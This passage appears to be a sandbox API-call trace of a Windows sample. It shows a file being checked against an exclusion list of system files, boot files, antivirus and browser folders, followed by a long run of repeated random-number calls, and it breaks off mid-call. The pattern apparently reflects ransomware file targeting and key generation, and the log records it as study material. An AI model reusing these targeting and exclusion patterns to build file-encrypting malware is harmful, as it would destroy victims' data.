PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.bat") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.ini") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.msi") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.scf") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*pagefile.sys*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*AppData*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\winrar\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\java\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\windows\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\ESET\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\AVG\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*Atheros*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*Realtek*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*bootmgr*") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*boot*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*boot*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*IO.SYS*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*ntldr*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*chrome*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*opera*") returned 0 [0147.999] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*firefox*") returned 0 [0147.999] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", pszSpec="*") returned 1 [0147.999] strlen (_Str="NMoreira") returned 0x8 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.999] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.000] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.001] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.002] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 